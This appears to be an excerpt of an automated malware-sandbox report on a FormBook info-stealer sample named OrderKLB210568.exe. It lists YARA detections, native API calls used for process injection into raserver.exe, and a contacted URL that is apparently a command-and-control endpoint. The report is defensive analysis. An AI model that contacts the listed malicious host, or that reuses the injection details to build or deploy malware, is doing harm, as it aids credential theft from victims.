          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 00000009.00000002.923694061.0000000005782000.00000004.00000001.sdmpString found in binary or memory: https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: OrderKLB210568.exe, 00000000.00000002.667430799.00000000007AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: OrderKLB210568.exe
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00418212 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AFA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AFA770 NtOpenThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00418212 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0513AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0513A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0513A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0513B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0513A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05139A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_010181C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_010183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01018270 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_010182F0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01018212 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_6FC41A98
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B83E
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041C171
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00401208
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041C429
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B4A3
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041BDB4
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B820A8
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACB090
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B828EC
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8E824
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71002
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABF900
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B822AE
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6FA2B
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEEBB0
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7DBD2
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B703DA
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B82B28
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC841F
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7D466
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACD5E0
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B825DD
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB0D20
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B82D07
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B81D55
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B82EF7
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD6E30
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7D616
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B81FF1
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8DFCE
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00401026
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B83E
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041C171
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00401208
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00408C60
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041C429
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B4A3
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041BDB4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BD466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051CDFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BD616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05116E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05114120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051199BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051CE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0510B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051220A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511A309
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511AB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B03DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BDBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512ABD8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051A23E3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051AFA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051B4AEF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101C171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101B83E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01002D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101BDB4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101C429
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01008C60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101B4A3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01002FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 050FB150 appears 124 times
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: String function: 00419F70 appears 36 times
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: String function: 00ABB150 appears 45 times
          Source: OrderKLB210568.exe, 00000000.00000003.660414871.0000000009B46000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OrderKLB210568.exe
          Source: OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OrderKLB210568.exe
          Source: OrderKLB210568.exe, 00000001.00000002.720949048.0000000000A49000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs OrderKLB210568.exe
          Source: OrderKLB210568.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
